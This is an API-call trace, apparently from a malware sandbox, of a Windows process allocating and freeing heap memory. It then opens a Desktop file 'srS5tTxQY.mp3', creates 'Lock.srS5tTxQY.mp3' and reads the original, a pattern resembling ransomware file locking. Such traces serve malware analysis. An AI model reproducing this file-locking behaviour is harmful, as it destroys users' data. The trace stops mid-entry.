[0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0189.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0189.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0189.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.266] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.267] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.267] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.267] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/srS5tTxQY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\srs5ttxqy.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0189.267] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.267] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0189.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0189.267] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.268] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.268] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0189.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.268] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.srS5tTxQY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.srs5ttxqy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0189.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0189.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0189.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.269] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0189.269] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x9f34, lpOverlapped=0x0) returned 1 [0189.271] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0189.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9f34) returned 0x24d7a58 [0189.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0189.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0189.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0189.273] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0189.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0189.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9f34) returned 0x24d7a58 [0189.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0189.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0189.274] RtlAllocateHeap 